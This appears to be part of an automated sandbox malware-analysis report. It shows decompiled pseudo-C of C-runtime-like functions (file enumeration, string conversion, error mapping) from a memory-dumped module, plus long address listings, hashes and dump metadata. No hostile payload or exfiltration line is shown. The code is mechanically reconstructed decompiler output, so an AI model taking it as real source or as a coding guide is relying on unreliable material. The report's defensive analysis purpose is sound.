																			goto L67;
																		} else {
																			__eflags =  *((intOrPtr*)(_t188 + 2)) - _t226;
																			if( *((intOrPtr*)(_t188 + 2)) == _t226) {
																				goto L68;
																			} else {
																				goto L67;
																			}
																		}
																	}
																}
																L76:
																FindClose(_t301);
																goto L77;
																L68:
																__eflags = _v620 - _t226;
																if(_v620 != _t226) {
																	E736DA293(_v632);
																}
																__eflags = FindNextFileW(_t301,  &_v608);
															} while (__eflags != 0);
															_t196 = _v616;
															_t257 = _v648;
															_t278 =  *_t196;
															_t199 =  *((intOrPtr*)(_t196 + 4)) -  *_t196 >> 2;
															__eflags = _t257 - _t199;
															if(_t257 != _t199) {
																E736DCCB0(_t278, _t278 + _t257 * 4, _t199 - _t257, 4, E736DA2CD);
															}
															goto L76;
														} else {
															_push(_v616);
															_push(_t226);
															_push(_t226);
															_push(_t287);
															L33();
															_t226 = _t179;
														}
														L77:
														__eflags = _v656;
														_pop(_t300);
														if(_v656 != 0) {
															E736DA293(_v668);
														}
														_t190 = _t226;
													} else {
														_t190 = _t287 + 1;
														__eflags = _t244 - _t287 + 1;
														if(_t244 == _t287 + 1) {
															_t168 = _v609;
															goto L56;
														} else {
															_push(_t278);
															_push(0);
															_push(0);
															_push(_t287);
															L33();
														}
													}
													_pop(_t288);
													__eflags = _v16 ^ _t307;
													_pop(_t227);
													return E736D6EA3(_t190, _t227, _v16 ^ _t307, _t278, _t288, _t300);
												} else {
													goto L40;
												}
											}
										} else {
											_t209 = 0xc;
											L37:
											return _t209;
										}
									} else {
										goto L23;
									}
									goto L81;
									L23:
									_t212 = _v12;
									_t263 = _v16;
									 *((intOrPtr*)(_v32 + _t212)) = _t263;
									_t140 = _t212 + 4;
									_t233 = _t263 + _v20;
									_v16 = _t233;
									_v12 = _t140;
									__eflags = _t140 - _v40;
								} while (_t140 != _v40);
								goto L24;
							}
						} else {
							_t297 = _t296 | 0xffffffff;
							_v12 = _t297;
							L25:
							E736DA293(_t222);
							_pop(_t234);
							goto L26;
						}
					} else {
						while(1) {
							_v8 = 0x3f2a;
							_v6 = _t222;
							_t217 = E736DD1C0(_t132,  &_v8);
							_t234 =  *_t292;
							__eflags = _t217;
							if(_t217 != 0) {
								_push( &(_v608.cAlternateFileName));
								_push(_t217);
								_push(_t234);
								L46();
								_t309 = _t309 + 0xc;
								_v12 = _t217;
								_t297 = _t217;
							} else {
								_t218 =  &(_v608.cAlternateFileName);
								_push(_t218);
								_push(_t222);
								_push(_t222);
								_push(_t234);
								L33();
								_t297 = _t218;
								_t309 = _t309 + 0x10;
								_v12 = _t297;
							}
							__eflags = _t297;
							if(_t297 != 0) {
								break;
							}
							_t292 =  &(_a4[1]);
							_a4 = _t292;
							_t132 =  *_t292;
							__eflags = _t132;
							if(_t132 != 0) {
								continue;
							} else {
								_t283 = _v608.cAlternateFileName;
								_t232 = _v40;
								goto L9;
							}
							goto L81;
						}
						_t283 = _v608.cAlternateFileName;
						L26:
						_t272 = _t283;
						_v32 = _t272;
						__eflags = _v40 - _t272;
						asm("sbb ecx, ecx");
						_t236 =  !_t234 & _v40 - _t272 + 0x00000003 >> 0x00000002;
						__eflags = _t236;
						_v28 = _t236;
						if(_t236 != 0) {
							_t299 = _t236;
							do {
								E736DA293( *_t283);
								_t222 = _t222 + 1;
								_t283 = _t283 + 4;
								__eflags = _t222 - _t299;
							} while (_t222 != _t299);
							_t283 = _v608.cAlternateFileName;
							_t297 = _v12;
						}
						E736DA293(_t283);
						goto L31;
					}
				} else {
					_t219 = E736DA223(_t317);
					_t297 = 0x16;
					 *_t219 = _t297;
					E736DA166();
					L31:
					return _t297;
				}
				L81:
			}

















































































































                                                                                                                                                                                                                                0x736da48a
                                                                                                                                                                                                                                0x736da48d
                                                                                                                                                                                                                                0x736da490
                                                                                                                                                                                                                                0x736da491
                                                                                                                                                                                                                                0x736da493
                                                                                                                                                                                                                                0x736da4a9
                                                                                                                                                                                                                                0x736da4ad
                                                                                                                                                                                                                                0x736da4b0
                                                                                                                                                                                                                                0x736da4b2
                                                                                                                                                                                                                                0x736da4b4
                                                                                                                                                                                                                                0x736da4b6
                                                                                                                                                                                                                                0x736da4b8
                                                                                                                                                                                                                                0x736da4bb
                                                                                                                                                                                                                                0x736da4be
                                                                                                                                                                                                                                0x736da4c1
                                                                                                                                                                                                                                0x736da4c3
                                                                                                                                                                                                                                0x736da526
                                                                                                                                                                                                                                0x736da528
                                                                                                                                                                                                                                0x736da52b
                                                                                                                                                                                                                                0x736da52d
                                                                                                                                                                                                                                0x736da531
                                                                                                                                                                                                                                0x736da53a
                                                                                                                                                                                                                                0x736da53b
                                                                                                                                                                                                                                0x736da53e
                                                                                                                                                                                                                                0x736da540
                                                                                                                                                                                                                                0x736da543
                                                                                                                                                                                                                                0x736da547
                                                                                                                                                                                                                                0x736da547
                                                                                                                                                                                                                                0x736da549
                                                                                                                                                                                                                                0x736da54b
                                                                                                                                                                                                                                0x736da54d
                                                                                                                                                                                                                                0x736da54f
                                                                                                                                                                                                                                0x736da54f
                                                                                                                                                                                                                                0x736da551
                                                                                                                                                                                                                                0x736da554
                                                                                                                                                                                                                                0x736da557
                                                                                                                                                                                                                                0x736da557
                                                                                                                                                                                                                                0x736da559
                                                                                                                                                                                                                                0x736da55a
                                                                                                                                                                                                                                0x736da55a
                                                                                                                                                                                                                                0x736da565
                                                                                                                                                                                                                                0x736da567
                                                                                                                                                                                                                                0x736da56a
                                                                                                                                                                                                                                0x736da56b
                                                                                                                                                                                                                                0x736da56e
                                                                                                                                                                                                                                0x736da56e
                                                                                                                                                                                                                                0x736da572
                                                                                                                                                                                                                                0x736da575
                                                                                                                                                                                                                                0x736da578
                                                                                                                                                                                                                                0x736da578
                                                                                                                                                                                                                                0x736da578
                                                                                                                                                                                                                                0x736da585
                                                                                                                                                                                                                                0x736da587
                                                                                                                                                                                                                                0x736da58a
                                                                                                                                                                                                                                0x736da58c
                                                                                                                                                                                                                                0x736da5a4
                                                                                                                                                                                                                                0x736da5a7
                                                                                                                                                                                                                                0x736da5aa
                                                                                                                                                                                                                                0x736da5ac
                                                                                                                                                                                                                                0x736da5af
                                                                                                                                                                                                                                0x736da5b1
                                                                                                                                                                                                                                0x736da5b4
                                                                                                                                                                                                                                0x736da5b7
                                                                                                                                                                                                                                0x736da614
                                                                                                                                                                                                                                0x736da617
                                                                                                                                                                                                                                0x736da61a
                                                                                                                                                                                                                                0x736da61c
                                                                                                                                                                                                                                0x00000000
                                                                                                                                                                                                                                0x736da5b9
                                                                                                                                                                                                                                0x736da5bb
                                                                                                                                                                                                                                0x736da5bb
                                                                                                                                                                                                                                0x736da5bd
                                                                                                                                                                                                                                0x736da5c0
                                                                                                                                                                                                                                0x736da5c0
                                                                                                                                                                                                                                0x736da5c2
                                                                                                                                                                                                                                0x736da5c4
                                                                                                                                                                                                                                0x736da5ca
                                                                                                                                                                                                                                0x736da5cd
                                                                                                                                                                                                                                0x736da5cd
                                                                                                                                                                                                                                0x736da5cf
                                                                                                                                                                                                                                0x736da5d0
                                                                                                                                                                                                                                0x736da5d0
                                                                                                                                                                                                                                0x736da5d7
                                                                                                                                                                                                                                0x736da5da
                                                                                                                                                                                                                                0x736da5de
                                                                                                                                                                                                                                0x736da5eb
                                                                                                                                                                                                                                0x736da5f0
                                                                                                                                                                                                                                0x736da5f3
                                                                                                                                                                                                                                0x736da5f5
                                                                                                                                                                                                                                0x736da66b
                                                                                                                                                                                                                                0x736da66c
                                                                                                                                                                                                                                0x736da66d
                                                                                                                                                                                                                                0x736da66e
                                                                                                                                                                                                                                0x736da66f
                                                                                                                                                                                                                                0x736da670
                                                                                                                                                                                                                                0x736da675
                                                                                                                                                                                                                                0x736da679
                                                                                                                                                                                                                                0x736da67b
                                                                                                                                                                                                                                0x736da67c
                                                                                                                                                                                                                                0x736da67f
                                                                                                                                                                                                                                0x736da67f
                                                                                                                                                                                                                                0x736da682
                                                                                                                                                                                                                                0x736da682
                                                                                                                                                                                                                                0x736da684
                                                                                                                                                                                                                                0x736da685
                                                                                                                                                                                                                                0x736da685
                                                                                                                                                                                                                                0x736da689
                                                                                                                                                                                                                                0x736da68a
                                                                                                                                                                                                                                0x736da691
                                                                                                                                                                                                                                0x736da694
                                                                                                                                                                                                                                0x736da697
                                                                                                                                                                                                                                0x736da699
                                                                                                                                                                                                                                0x736da6a3
                                                                                                                                                                                                                                0x736da6a4
                                                                                                                                                                                                                                0x736da6a5
                                                                                                                                                                                                                                0x736da6a8
                                                                                                                                                                                                                                0x736da6b2
                                                                                                                                                                                                                                0x736da6b6
                                                                                                                                                                                                                                0x736da6b8
                                                                                                                                                                                                                                0x736da6cc
                                                                                                                                                                                                                                0x736da6cc
                                                                                                                                                                                                                                0x736da6cf
                                                                                                                                                                                                                                0x736da6d9
                                                                                                                                                                                                                                0x736da6de
                                                                                                                                                                                                                                0x736da6e1
                                                                                                                                                                                                                                0x736da6e3
                                                                                                                                                                                                                                0x00000000
                                                                                                                                                                                                                                0x736da6e5
                                                                                                                                                                                                                                0x736da6e5
                                                                                                                                                                                                                                0x736da6ea
                                                                                                                                                                                                                                0x736da6f1
                                                                                                                                                                                                                                0x736da6f4
                                                                                                                                                                                                                                0x736da6f6
                                                                                                                                                                                                                                0x736da707
                                                                                                                                                                                                                                0x736da709
                                                                                                                                                                                                                                0x736da70b
                                                                                                                                                                                                                                0x736da70b
                                                                                                                                                                                                                                0x736da70b
                                                                                                                                                                                                                                0x736da6f8
                                                                                                                                                                                                                                0x736da6f9
                                                                                                                                                                                                                                0x736da6fe
                                                                                                                                                                                                                                0x736da701
                                                                                                                                                                                                                                0x736da710
                                                                                                                                                                                                                                0x736da716
                                                                                                                                                                                                                                0x00000000
                                                                                                                                                                                                                                0x736da719
                                                                                                                                                                                                                                0x736da6ba
                                                                                                                                                                                                                                0x736da6ba
                                                                                                                                                                                                                                0x736da6c0
                                                                                                                                                                                                                                0x736da6c5
                                                                                                                                                                                                                                0x736da6c8
                                                                                                                                                                                                                                0x736da6ca
                                                                                                                                                                                                                                0x736da71c
                                                                                                                                                                                                                                0x736da71e
                                                                                                                                                                                                                                0x736da71f
                                                                                                                                                                                                                                0x736da720
                                                                                                                                                                                                                                0x736da721
                                                                                                                                                                                                                                0x736da722
                                                                                                                                                                                                                                0x736da723
                                                                                                                                                                                                                                0x736da728
                                                                                                                                                                                                                                0x736da72b
                                                                                                                                                                                                                                0x736da72c
                                                                                                                                                                                                                                0x736da72e
                                                                                                                                                                                                                                0x736da734
                                                                                                                                                                                                                                0x736da73b
                                                                                                                                                                                                                                0x736da73e
                                                                                                                                                                                                                                0x736da741
                                                                                                                                                                                                                                0x736da744
                                                                                                                                                                                                                                0x736da745
                                                                                                                                                                                                                                0x736da746
                                                                                                                                                                                                                                0x736da749
                                                                                                                                                                                                                                0x736da74f
                                                                                                                                                                                                                                0x736da751
                                                                                                                                                                                                                                0x736da753
                                                                                                                                                                                                                                0x736da753
                                                                                                                                                                                                                                0x736da755
                                                                                                                                                                                                                                0x736da757
                                                                                                                                                                                                                                0x00000000
                                                                                                                                                                                                                                0x00000000
                                                                                                                                                                                                                                0x736da759
                                                                                                                                                                                                                                0x736da75b
                                                                                                                                                                                                                                0x736da75d
                                                                                                                                                                                                                                0x736da75f
                                                                                                                                                                                                                                0x736da76a
                                                                                                                                                                                                                                0x736da76c
                                                                                                                                                                                                                                0x736da76e
                                                                                                                                                                                                                                0x00000000
                                                                                                                                                                                                                                0x00000000
                                                                                                                                                                                                                                0x736da76e
                                                                                                                                                                                                                                0x736da75f
                                                                                                                                                                                                                                0x00000000
                                                                                                                                                                                                                                0x736da75b
                                                                                                                                                                                                                                0x736da770
                                                                                                                                                                                                                                0x736da770
                                                                                                                                                                                                                                0x736da776
                                                                                                                                                                                                                                0x736da778
                                                                                                                                                                                                                                0x736da77e
                                                                                                                                                                                                                                0x736da780
                                                                                                                                                                                                                                0x736da7a2
                                                                                                                                                                                                                                0x736da7a2
                                                                                                                                                                                                                                0x736da7a4
                                                                                                                                                                                                                                0x736da7a6
                                                                                                                                                                                                                                0x736da7b2
                                                                                                                                                                                                                                0x736da7b2
                                                                                                                                                                                                                                0x736da7a8
                                                                                                                                                                                                                                0x736da7a8
                                                                                                                                                                                                                                0x736da7aa
                                                                                                                                                                                                                                0x00000000
                                                                                                                                                                                                                                0x736da7ac
                                                                                                                                                                                                                                0x736da7ac
                                                                                                                                                                                                                                0x736da7ae
                                                                                                                                                                                                                                0x736da7b0
                                                                                                                                                                                                                                0x00000000
                                                                                                                                                                                                                                0x00000000
                                                                                                                                                                                                                                0x736da7b0
                                                                                                                                                                                                                                0x736da7aa
                                                                                                                                                                                                                                0x736da7ba
                                                                                                                                                                                                                                0x736da7c2
                                                                                                                                                                                                                                0x736da7c8
                                                                                                                                                                                                                                0x736da7c9
                                                                                                                                                                                                                                0x736da7cb
                                                                                                                                                                                                                                0x736da7d3
                                                                                                                                                                                                                                0x736da7d9
                                                                                                                                                                                                                                0x736da7df
                                                                                                                                                                                                                                0x736da7e5
                                                                                                                                                                                                                                0x736da7f9
                                                                                                                                                                                                                                0x736da7fe
                                                                                                                                                                                                                                0x736da809
                                                                                                                                                                                                                                0x736da819
                                                                                                                                                                                                                                0x736da81f
                                                                                                                                                                                                                                0x736da821
                                                                                                                                                                                                                                0x736da824
                                                                                                                                                                                                                                0x736da847
                                                                                                                                                                                                                                0x736da847
                                                                                                                                                                                                                                0x736da84c
                                                                                                                                                                                                                                0x736da852
                                                                                                                                                                                                                                0x736da852
                                                                                                                                                                                                                                0x736da858
                                                                                                                                                                                                                                0x736da85e
                                                                                                                                                                                                                                0x736da864
                                                                                                                                                                                                                                0x736da86a
                                                                                                                                                                                                                                0x736da870
                                                                                                                                                                                                                                0x736da891
                                                                                                                                                                                                                                0x736da896
                                                                                                                                                                                                                                0x736da89b
                                                                                                                                                                                                                                0x736da89f
                                                                                                                                                                                                                                0x736da8a5
                                                                                                                                                                                                                                0x736da8a8
                                                                                                                                                                                                                                0x736da8bb
                                                                                                                                                                                                                                0x736da8bb
                                                                                                                                                                                                                                0x736da8c1
                                                                                                                                                                                                                                0x736da8c7
                                                                                                                                                                                                                                0x736da8c8
                                                                                                                                                                                                                                0x736da8c9
                                                                                                                                                                                                                                0x736da8ce
                                                                                                                                                                                                                                0x736da8d1
                                                                                                                                                                                                                                0x736da8d7
                                                                                                                                                                                                                                0x736da8d9
                                                                                                                                                                                                                                0x736da937
                                                                                                                                                                                                                                0x736da93d
                                                                                                                                                                                                                                0x736da945
                                                                                                                                                                                                                                0x736da94a
                                                                                                                                                                                                                                0x736da950
                                                                                                                                                                                                                                0x736da951
                                                                                                                                                                                                                                0x00000000
                                                                                                                                                                                                                                0x00000000
                                                                                                                                                                                                                                0x00000000
                                                                                                                                                                                                                                0x736da8aa
                                                                                                                                                                                                                                0x736da8aa
                                                                                                                                                                                                                                0x736da8ad
                                                                                                                                                                                                                                0x736da8af
                                                                                                                                                                                                                                0x00000000
                                                                                                                                                                                                                                0x736da8b1
                                                                                                                                                                                                                                0x736da8b1
                                                                                                                                                                                                                                0x736da8b4
                                                                                                                                                                                                                                0x00000000
                                                                                                                                                                                                                                0x736da8b6
                                                                                                                                                                                                                                0x736da8b6
                                                                                                                                                                                                                                0x736da8b9
                                                                                                                                                                                                                                0x00000000
                                                                                                                                                                                                                                0x00000000
                                                                                                                                                                                                                                0x00000000
                                                                                                                                                                                                                                0x00000000
                                                                                                                                                                                                                                0x736da8b9
                                                                                                                                                                                                                                0x736da8b4
                                                                                                                                                                                                                                0x736da8af
                                                                                                                                                                                                                                0x736da953
                                                                                                                                                                                                                                0x736da954
                                                                                                                                                                                                                                0x00000000
                                                                                                                                                                                                                                0x736da8db
                                                                                                                                                                                                                                0x736da8db
                                                                                                                                                                                                                                0x736da8e1
                                                                                                                                                                                                                                0x736da8e9
                                                                                                                                                                                                                                0x736da8ee
                                                                                                                                                                                                                                0x736da8fd
                                                                                                                                                                                                                                0x736da8fd
                                                                                                                                                                                                                                0x736da905
                                                                                                                                                                                                                                0x736da90b
                                                                                                                                                                                                                                0x736da911
                                                                                                                                                                                                                                0x736da918
                                                                                                                                                                                                                                0x736da91b
                                                                                                                                                                                                                                0x736da91d
                                                                                                                                                                                                                                0x736da92d
                                                                                                                                                                                                                                0x736da932
                                                                                                                                                                                                                                0x00000000
                                                                                                                                                                                                                                0x736da826
                                                                                                                                                                                                                                0x736da826
                                                                                                                                                                                                                                0x736da82c
                                                                                                                                                                                                                                0x736da82d
                                                                                                                                                                                                                                0x736da82e
                                                                                                                                                                                                                                0x736da82f
                                                                                                                                                                                                                                0x736da837
                                                                                                                                                                                                                                0x736da837
                                                                                                                                                                                                                                0x736da95a
                                                                                                                                                                                                                                0x736da95a
                                                                                                                                                                                                                                0x736da961
                                                                                                                                                                                                                                0x736da962
                                                                                                                                                                                                                                0x736da96a
                                                                                                                                                                                                                                0x736da96f
                                                                                                                                                                                                                                0x736da970
                                                                                                                                                                                                                                0x736da782
                                                                                                                                                                                                                                0x736da782
                                                                                                                                                                                                                                0x736da785
                                                                                                                                                                                                                                0x736da787
                                                                                                                                                                                                                                0x736da79c
                                                                                                                                                                                                                                0x00000000
                                                                                                                                                                                                                                0x736da789
                                                                                                                                                                                                                                0x736da789
                                                                                                                                                                                                                                0x736da78c
                                                                                                                                                                                                                                0x736da78d
                                                                                                                                                                                                                                0x736da78e
                                                                                                                                                                                                                                0x736da78f
                                                                                                                                                                                                                                0x736da794
                                                                                                                                                                                                                                0x736da787
                                                                                                                                                                                                                                0x736da975
                                                                                                                                                                                                                                0x736da976
                                                                                                                                                                                                                                0x736da978
                                                                                                                                                                                                                                0x736da981
                                                                                                                                                                                                                                0x00000000
                                                                                                                                                                                                                                0x00000000
                                                                                                                                                                                                                                0x00000000
                                                                                                                                                                                                                                0x736da6ca
                                                                                                                                                                                                                                0x736da69b
                                                                                                                                                                                                                                0x736da69d
                                                                                                                                                                                                                                0x736da69e
                                                                                                                                                                                                                                0x736da6a2
                                                                                                                                                                                                                                0x736da6a2
                                                                                                                                                                                                                                0x00000000
                                                                                                                                                                                                                                0x00000000
                                                                                                                                                                                                                                0x00000000
                                                                                                                                                                                                                                0x00000000
                                                                                                                                                                                                                                0x736da5f7
                                                                                                                                                                                                                                0x736da5f7
                                                                                                                                                                                                                                0x736da5fd
                                                                                                                                                                                                                                0x736da600
                                                                                                                                                                                                                                0x736da603
                                                                                                                                                                                                                                0x736da606
                                                                                                                                                                                                                                0x736da609
                                                                                                                                                                                                                                0x736da60c
                                                                                                                                                                                                                                0x736da60f
                                                                                                                                                                                                                                0x736da60f
                                                                                                                                                                                                                                0x00000000
                                                                                                                                                                                                                                0x736da5c0
                                                                                                                                                                                                                                0x736da58e
                                                                                                                                                                                                                                0x736da58e
                                                                                                                                                                                                                                0x736da591
                                                                                                                                                                                                                                0x736da61e
                                                                                                                                                                                                                                0x736da61f
                                                                                                                                                                                                                                0x736da624
                                                                                                                                                                                                                                0x00000000
                                                                                                                                                                                                                                0x736da624
                                                                                                                                                                                                                                0x736da4c5
                                                                                                                                                                                                                                0x736da4c5
                                                                                                                                                                                                                                0x736da4c8
                                                                                                                                                                                                                                0x736da4d0
                                                                                                                                                                                                                                0x736da4d3
                                                                                                                                                                                                                                0x736da4da
                                                                                                                                                                                                                                0x736da4dc
                                                                                                                                                                                                                                0x736da4de
                                                                                                                                                                                                                                0x736da4f9
                                                                                                                                                                                                                                0x736da4fa
                                                                                                                                                                                                                                0x736da4fb
                                                                                                                                                                                                                                0x736da4fc
                                                                                                                                                                                                                                0x736da501
                                                                                                                                                                                                                                0x736da504
                                                                                                                                                                                                                                0x736da507
                                                                                                                                                                                                                                0x736da4e0
                                                                                                                                                                                                                                0x736da4e0
                                                                                                                                                                                                                                0x736da4e3
                                                                                                                                                                                                                                0x736da4e4
                                                                                                                                                                                                                                0x736da4e5
                                                                                                                                                                                                                                0x736da4e6
                                                                                                                                                                                                                                0x736da4e7
                                                                                                                                                                                                                                0x736da4ec
                                                                                                                                                                                                                                0x736da4ee
                                                                                                                                                                                                                                0x736da4f1
                                                                                                                                                                                                                                0x736da4f1
                                                                                                                                                                                                                                0x736da509
                                                                                                                                                                                                                                0x736da50b
                                                                                                                                                                                                                                0x00000000
                                                                                                                                                                                                                                0x00000000
                                                                                                                                                                                                                                0x736da514
                                                                                                                                                                                                                                0x736da517
                                                                                                                                                                                                                                0x736da51a
                                                                                                                                                                                                                                0x736da51c
                                                                                                                                                                                                                                0x736da51e
                                                                                                                                                                                                                                0x00000000
                                                                                                                                                                                                                                0x736da520
                                                                                                                                                                                                                                0x736da520
                                                                                                                                                                                                                                0x736da523
                                                                                                                                                                                                                                0x00000000
                                                                                                                                                                                                                                0x736da523
                                                                                                                                                                                                                                0x00000000
                                                                                                                                                                                                                                0x736da51e
                                                                                                                                                                                                                                0x736da599
                                                                                                                                                                                                                                0x736da625
                                                                                                                                                                                                                                0x736da628
                                                                                                                                                                                                                                0x736da62c
                                                                                                                                                                                                                                0x736da635
                                                                                                                                                                                                                                0x736da638
                                                                                                                                                                                                                                0x736da63c
                                                                                                                                                                                                                                0x736da63c
                                                                                                                                                                                                                                0x736da63e
                                                                                                                                                                                                                                0x736da641
                                                                                                                                                                                                                                0x736da643
                                                                                                                                                                                                                                0x736da645
                                                                                                                                                                                                                                0x736da647
                                                                                                                                                                                                                                0x736da64c
                                                                                                                                                                                                                                0x736da64d
                                                                                                                                                                                                                                0x736da651
                                                                                                                                                                                                                                0x736da651
                                                                                                                                                                                                                                0x736da655
                                                                                                                                                                                                                                0x736da658
                                                                                                                                                                                                                                0x736da658
                                                                                                                                                                                                                                0x736da65c
                                                                                                                                                                                                                                0x00000000
                                                                                                                                                                                                                                0x736da663
                                                                                                                                                                                                                                0x736da495
                                                                                                                                                                                                                                0x736da495
                                                                                                                                                                                                                                0x736da49c
                                                                                                                                                                                                                                0x736da49d
                                                                                                                                                                                                                                0x736da49f
                                                                                                                                                                                                                                0x736da664
                                                                                                                                                                                                                                0x736da66a
                                                                                                                                                                                                                                0x736da66a
                                                                                                                                                                                                                                0x00000000

                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                • Source File: 00000002.00000002.881779075.00000000736D1000.00000020.00020000.sdmp, Offset: 736D0000, based on PE: true
                                                                                                                                                                                                                                • Associated: 00000002.00000002.881755550.00000000736D0000.00000002.00020000.sdmp Download File
                                                                                                                                                                                                                                • Associated: 00000002.00000002.881828436.00000000736E1000.00000002.00020000.sdmp Download File
                                                                                                                                                                                                                                • Associated: 00000002.00000002.881847723.00000000736EB000.00000004.00020000.sdmp Download File
                                                                                                                                                                                                                                • Associated: 00000002.00000002.881877209.00000000736EC000.00000008.00020000.sdmp Download File
                                                                                                                                                                                                                                • Associated: 00000002.00000002.881905060.00000000736EF000.00000004.00020000.sdmp Download File
                                                                                                                                                                                                                                • Associated: 00000002.00000002.881930845.00000000736F2000.00000002.00020000.sdmp Download File
                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                • API ID: _free
                                                                                                                                                                                                                                • String ID: *?
                                                                                                                                                                                                                                • API String ID: 269201875-2564092906
                                                                                                                                                                                                                                • Opcode ID: 64ce4d84af9dd0348b0bdc1ed56a3b0106e437a61b3be5bb0858fc8ce406034e
                                                                                                                                                                                                                                • Instruction ID: 15dcc314aeeddb05f5ee9c0b6508e268adee9202471e1a7ab2ecf7d7b893703f
                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 64ce4d84af9dd0348b0bdc1ed56a3b0106e437a61b3be5bb0858fc8ce406034e
                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 3F615EB5D142199FDF15CFA9C9806EDFBF9EF48310B18816AD815E7380E635DE418B90
                                                                                                                                                                                                                                Uniqueness

                                                                                                                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                                                                                                                Function 736DA397, Relevance: 6.1, APIs: 4, Instructions: 86COMMON
                                                                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                                                                C-Code - Quality: 100%
                                                                                                                                                                                                                                			E736DA397(intOrPtr* _a4, intOrPtr _a8, intOrPtr _a16) {
				intOrPtr _t16;
				intOrPtr _t17;
				intOrPtr _t19;
				intOrPtr _t29;
				char _t31;
				intOrPtr _t38;
				intOrPtr* _t40;
				intOrPtr _t41;

				_t40 = _a4;
				if(_t40 != 0) {
					_t31 = 0;
					__eflags =  *_t40;
					if( *_t40 != 0) {
						_t16 = E736DB595(_a16, 0, _t40, 0xffffffff, 0, 0, 0, 0);
						__eflags = _t16;
						if(__eflags != 0) {
							_t38 = _a8;
							__eflags = _t16 -  *((intOrPtr*)(_t38 + 0xc));
							if(__eflags <= 0) {
								L11:
								_t17 = E736DB595(_a16, _t31, _t40, 0xffffffff,  *((intOrPtr*)(_t38 + 8)),  *((intOrPtr*)(_t38 + 0xc)), _t31, _t31);
								__eflags = _t17;
								if(__eflags != 0) {
									 *((intOrPtr*)(_t38 + 0x10)) = _t17 - 1;
									_t19 = 0;
									__eflags = 0;
								} else {
									E736DA1ED(GetLastError());
									_t19 =  *((intOrPtr*)(E736DA223(__eflags)));
								}
								L14:
								return _t19;
							}
							_t19 = E736DA9DD(_t38, __eflags, _t16);
							__eflags = _t19;
							if(_t19 != 0) {
								goto L14;
							}
							goto L11;
						}
						E736DA1ED(GetLastError());
						return  *((intOrPtr*)(E736DA223(__eflags)));
					}
					_t41 = _a8;
					__eflags =  *((intOrPtr*)(_t41 + 0xc));
					if(__eflags != 0) {
						L6:
						 *((char*)( *((intOrPtr*)(_t41 + 8)))) = _t31;
						L2:
						 *((intOrPtr*)(_t41 + 0x10)) = _t31;
						return 0;
					}
					_t29 = E736DA9DD(_t41, __eflags, 1);
					__eflags = _t29;
					if(_t29 != 0) {
						return _t29;
					}
					goto L6;
				}
				_t41 = _a8;
				E736DA9C3(_t41);
				_t31 = 0;
				 *((intOrPtr*)(_t41 + 8)) = 0;
				 *((intOrPtr*)(_t41 + 0xc)) = 0;
				goto L2;
			}











                                                                                                                                                                                                                                0x736da39e
                                                                                                                                                                                                                                0x736da3a3
                                                                                                                                                                                                                                0x736da3c1
                                                                                                                                                                                                                                0x736da3c3
                                                                                                                                                                                                                                0x736da3c6
                                                                                                                                                                                                                                0x736da3f3
                                                                                                                                                                                                                                0x736da3fb
                                                                                                                                                                                                                                0x736da3fd
                                                                                                                                                                                                                                0x736da416
                                                                                                                                                                                                                                0x736da419
                                                                                                                                                                                                                                0x736da41c
                                                                                                                                                                                                                                0x736da42a
                                                                                                                                                                                                                                0x736da439
                                                                                                                                                                                                                                0x736da441
                                                                                                                                                                                                                                0x736da443
                                                                                                                                                                                                                                0x736da45c
                                                                                                                                                                                                                                0x736da45f
                                                                                                                                                                                                                                0x736da45f
                                                                                                                                                                                                                                0x736da445
                                                                                                                                                                                                                                0x736da44c
                                                                                                                                                                                                                                0x736da457
                                                                                                                                                                                                                                0x736da457
                                                                                                                                                                                                                                0x736da461
                                                                                                                                                                                                                                0x00000000
                                                                                                                                                                                                                                0x736da461
                                                                                                                                                                                                                                0x736da421
                                                                                                                                                                                                                                0x736da426
                                                                                                                                                                                                                                0x736da428
                                                                                                                                                                                                                                0x00000000
                                                                                                                                                                                                                                0x00000000
                                                                                                                                                                                                                                0x00000000
                                                                                                                                                                                                                                0x736da428
                                                                                                                                                                                                                                0x736da406
                                                                                                                                                                                                                                0x00000000
                                                                                                                                                                                                                                0x736da411
                                                                                                                                                                                                                                0x736da3c8
                                                                                                                                                                                                                                0x736da3cb
                                                                                                                                                                                                                                0x736da3ce
                                                                                                                                                                                                                                0x736da3e1
                                                                                                                                                                                                                                0x736da3e4
                                                                                                                                                                                                                                0x736da3b7
                                                                                                                                                                                                                                0x736da3b7
                                                                                                                                                                                                                                0x00000000
                                                                                                                                                                                                                                0x736da3ba
                                                                                                                                                                                                                                0x736da3d4
                                                                                                                                                                                                                                0x736da3d9
                                                                                                                                                                                                                                0x736da3db
                                                                                                                                                                                                                                0x736da465
                                                                                                                                                                                                                                0x736da465
                                                                                                                                                                                                                                0x00000000
                                                                                                                                                                                                                                0x736da3db
                                                                                                                                                                                                                                0x736da3a5
                                                                                                                                                                                                                                0x736da3aa
                                                                                                                                                                                                                                0x736da3af
                                                                                                                                                                                                                                0x736da3b1
                                                                                                                                                                                                                                0x736da3b4
                                                                                                                                                                                                                                0x00000000

                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                  • Part of subcall function 736DA9C3: _free.LIBCMT ref: 736DA9D1
                                                                                                                                                                                                                                  • Part of subcall function 736DB595: WideCharToMultiByte.KERNEL32(00000000,00000000,00000000,00000000,?,00000000,?,?,00000000,00000000,00000000,?,736DD577,?,00000000,00000000), ref: 736DB637
                                                                                                                                                                                                                                • GetLastError.KERNEL32 ref: 736DA3FF
                                                                                                                                                                                                                                • __dosmaperr.LIBCMT ref: 736DA406
                                                                                                                                                                                                                                • GetLastError.KERNEL32(?,?,?,?,?,?,?), ref: 736DA445
                                                                                                                                                                                                                                • __dosmaperr.LIBCMT ref: 736DA44C
                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                • Source File: 00000002.00000002.881779075.00000000736D1000.00000020.00020000.sdmp, Offset: 736D0000, based on PE: true
                                                                                                                                                                                                                                • Associated: 00000002.00000002.881755550.00000000736D0000.00000002.00020000.sdmp Download File
                                                                                                                                                                                                                                • Associated: 00000002.00000002.881828436.00000000736E1000.00000002.00020000.sdmp Download File
                                                                                                                                                                                                                                • Associated: 00000002.00000002.881847723.00000000736EB000.00000004.00020000.sdmp Download File
